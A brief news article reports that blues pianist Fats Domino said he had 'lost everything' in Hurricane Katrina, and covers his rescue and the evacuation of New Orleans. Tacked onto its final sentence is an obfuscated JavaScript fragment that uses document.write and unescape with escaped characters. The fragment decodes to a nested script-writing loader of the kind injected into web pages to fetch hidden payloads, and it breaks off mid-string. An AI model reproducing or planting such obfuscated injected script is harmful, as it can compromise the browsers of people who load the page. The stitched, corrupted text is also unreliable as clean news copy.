Fats Domino has revealed that he has “lost everything†in the wake of Hurricane Katrina.
The blues legend, who was reported missing in the aftermath of the natural disaster, was among those who chose not to leave the stricken New Orleans.
He is said to have spent the last few days at a friend's apartment in Baton Rouge.
Speaking to the Washington Post, Domino said: “We've lost everything.â€
He added: “I'm worried about all the people of New Orleans. Tell them I love them, and I wish I was home with them. I hope we'll see them soon."
Friends and relatives of the star were concerned about his whereabouts until Thursday evening (September 1) when one of his daughters, Karen Domino White, recognised him in a picture published by the New Orleans Times-Picayune, his agent Al Embry said.
The photograph showed a man resembling the pianist being helped out of a rescue boat.
His whereabouts remained unclear until Friday (September 2), although Domino was rescued from his home on Monday (August 29).
Domino has sold more than 110 million records, and is famous for such tracks as 'Blueberry Hill' and 'Ain't That A Shame'.
More than one million people were reported to have been evacuated from New Orleans and its surrounding areas before Hurricane Katrina struck.
Mayor Ray Nagin has estimated that up to 100,000 people remain in the city.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
